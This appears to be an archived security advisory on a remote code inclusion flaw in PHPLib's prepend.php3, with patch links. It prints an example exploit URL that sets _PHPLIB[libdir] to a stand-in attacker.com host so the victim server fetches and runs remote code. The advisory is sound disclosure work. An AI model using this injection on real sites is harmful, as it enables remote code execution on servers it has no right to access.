|
COMMAND prepend.php3 SYSTEMS AFFECTED PHPLib prior to 7.2 PROBLEM Nathan R. Hruby sent following. The PHPLib Team announced phplib-7.2d, availible now. This release fixes the recently discovered hole in prepend.php3 that can allow a remote attacker to inject non-local code into any phplib based script. Please note that this affects all applications that depend on PHPLib. Some apps have decided to distribute phplib along with their app for easier installation. Please check your phplib apps to determine if this is the case. What follows is the original announcemnt of the hole from the discoverer Giancarlo Pinerolo. Both PHP3 and PHP4 are vulnerable. The use of _PHPLIB[libdir] first appeared on versions of PHPLIB starting December 1998. In PHP, variables do not have to be declared. They are created as soon as a value is assigned to them. When PHP is configured with register_globaps enabled (as it is by default), variables submitted by the user are available in the global namespace. This means that, if a form or an URL query string contains a variable named "myvar", this variable is made available to the script as $myvar. Getting variables from user input is, in the end, what web programming is allabout, but in this case an attacker can exploit the fact that a variable, not meant to be accepted as input, can actually make its way in, because it has not been previously initialized by the script. PHP also has the possibility to pass associative arrays via the GET or POST methods. An example is an URL Like this: http://www.myhost.com/myscript.php?MYARRAY[element1] or a form whose input field looks like this: <INPUT type="text" name="MYARRAY[element1]"> PHP also has the possibility to transparently 'include' in a script other pieces of code via the 'include' and 'require' functions. It automatically discerns if the file to be included is on the local filesystem or on a remote location, when the php setting php_enable_fsockopen is true. include("myfile.php") # will include it from the local filesystem include("http://www.there.com/myfile.php") # will include it from # the net By providind a value for the the array element $_PHPLIB[libdir], an intruder can force a script to load and execute scripts from another server. This is because the value of $_PHPLIB[libdir] gets initalized *only* if not already set. This is particularly gravious because, in the normal PHPLIB installation, loadin other libraries is done at the very beginning. The first instructions in the file 'prepend.php3', that is the very first file which normally gets included in all PHPLIB installation, is: require($_PHPLIB["libdir"] . "db_mysql.inc"); or other filenames like 'db_pgsql.inc' for the postgres database, depending on the database in use. If, in te above instruction, $_PHPLIB[libdir] is a string whose value is "http://attacker.com/" the instrucion executed will be: require("http://attacker.com/" . "db_mysql.inc"); Thus, simply crafting and opening with a browser an URL like: http://victim.com/any/phplib/page.php?_PHPLIB[libdir]=http://attacker.com/ will make the script 'page.php', which the attacker knows is based on the PHPLIB toolkit, include and execute any arbitrary php instruction contained in a file named 'db_mysql.inc', loaded via an http request for it, located, in the example above, in the document root of the 'attacker.com' web server (http://attacker.com/db_mysql.inc) SOLUTION The current phplib.netuse.de site will be shortly removing all downloads and re-directing users to the new SourceForge site. Please be sure to keep an eye on http://sourceforge.net/projects/phplib/ Bug above is fixed now. For Trustix Linux: http://www.trustix.net/pub/Trustix/updates/ ftp://ftp.trustix.net/pub/Trustix/updates/ ftp://ftp.trustix.net/pub/Trustix/software/swup/ ./1.5/SRPMS/phplib-7.2d-1tr.src.rpm ./1.5/RPMS/phplib-7.2d-1tr.noarch.rpm ./1.2/SRPMS/phplib-7.2d-1tr.src.rpm ./1.2/RPMS/phplib-7.2d-1tr.noarch.rpm ./1.1/SRPMS/phplib-7.2d-1tr.src.rpm ./1.1/RPMS/phplib-7.2d-1tr.noarch.rpm